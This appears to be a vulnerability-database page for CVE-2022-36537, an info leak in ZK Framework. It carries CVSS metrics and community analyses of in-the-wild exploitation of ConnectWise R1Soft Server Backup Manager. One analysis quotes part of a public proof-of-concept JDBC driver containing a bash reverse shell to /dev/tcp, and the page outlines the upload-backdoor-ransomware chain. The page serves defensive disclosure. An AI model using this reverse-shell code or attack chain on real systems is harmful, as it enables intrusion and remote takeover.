Attacker Value
Very High
(2 users assessed)
Exploitability
High
(2 users assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
5

CVE-2022-36537

Disclosure Date: August 26, 2022
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Command and Control
Techniques
Validation
Validated
Defense Evasion
Techniques
Validation
Validated
Validated
Execution
Techniques
Validation
Validated
Exfiltration
Techniques
Validation
Validated
Validated
Initial Access
Techniques
Validation
Validated

Description

ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 allows attackers to access sensitive information via a crafted POST request sent to the component AuUploader.

Add Assessment

1
Ratings
Technical Analysis

The core vuln here is an info leak in ZK Framework, which — yep, you guessed it! — is a popular open-source Java library used to create enterprise mobile and web apps. The original advisory, NVD entry, and CVSS score are all predicated on the mere info leak, but as it turns out, other popular software that uses ZK Framework is vulnerable to full-on remote code execution via CVE-2022-36537. Both Huntress and NCC Group have noted that this bug is being exploited in vulnerable ConnectWise R1Soft Server Backup Manager software to gain initial access to target systems and then do a variety of not-good things, including installing malicious JDBC database drivers to backdoor systems, deploying ransomware, and so on.

Per various write-ups and public PoCs analyzed by @sfewer-r7, the following seems to happen:

  • Attacker uses the CVE-2022-36537 to leak the contents of /Configuration/database-drivers.zul, which yields a unique secret ID value
  • Armed with this value, attacker exploits vuln again to reach an endpoint that allows them to upload the JDBC driver, which functions as a handy backdoor
  • Attacker can now use the REST API to issue commands to registered agents to do nefarious things, like, you know, deploy your ransomware of choice to downstream systems
  • Oh and hey there are supply chain implications

We know the ConnectWise R1Soft vector is in active use and is easily exploitable, but this being a library vuln (so hot right now), that’s almost certainly not going to be the only attack vector. Some light recon done by folks smarter than me (namely the aforementioned @sfewer-r7) indicates there are plenty of other things that use ZK Framework. The question is which are vulnerable to remote exploits out of the box. Knocking this down an exploitability point overall simply because other applications may not be quite as easily exploitable remotely as the ConnectWise software.

If you’re using a vulnerable R1Soft Server Backup Manager version, please patch immediately. The NCC Group’s FOX IT team has a great write-up with IOCs and attack details.

1
Ratings
Technical Analysis

The “ZK” Framework is an open-source Java framework for building enterprise web and mobile applications. The R1Soft Server Backup Manager utilises. this framework.

By bypassing the authentication process, uploading a ‘custom and weaponized database driver (JDBC) that contains a payload for creating a remote shell on the device is possible. Excerpt from one of the public PoCs with a detail in the weaponized JDBC driver:

static {
    String winCmd = "dir";
    String linuxCmd = "bash -i >& /dev/tcp/192.168.1.0/2022 0>&1";

    String[] cmds = null;

    if (System.getProperty("os.name").toLowerCase().contains("win")) {
        cmds = new String[]{"cmd.exe", "/c", winCmd};
    } else {
        cmds = new String[]{"/bin/bash", "-c", linuxCmd};
    }

One of the Incident Response blogs in the referrals from Fox-IT mentions that activity since November 2022 has been observed where this software has been compromised and a backdoor is running on these systems.

CVSS V3 Severity and Metrics
Base Score:
7.5 High
Impact Score:
3.6
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
None
Availability (A):
None

General Information

Vendors

  • zkoss

Products

  • zk framework

Additional Info

Technical Analysis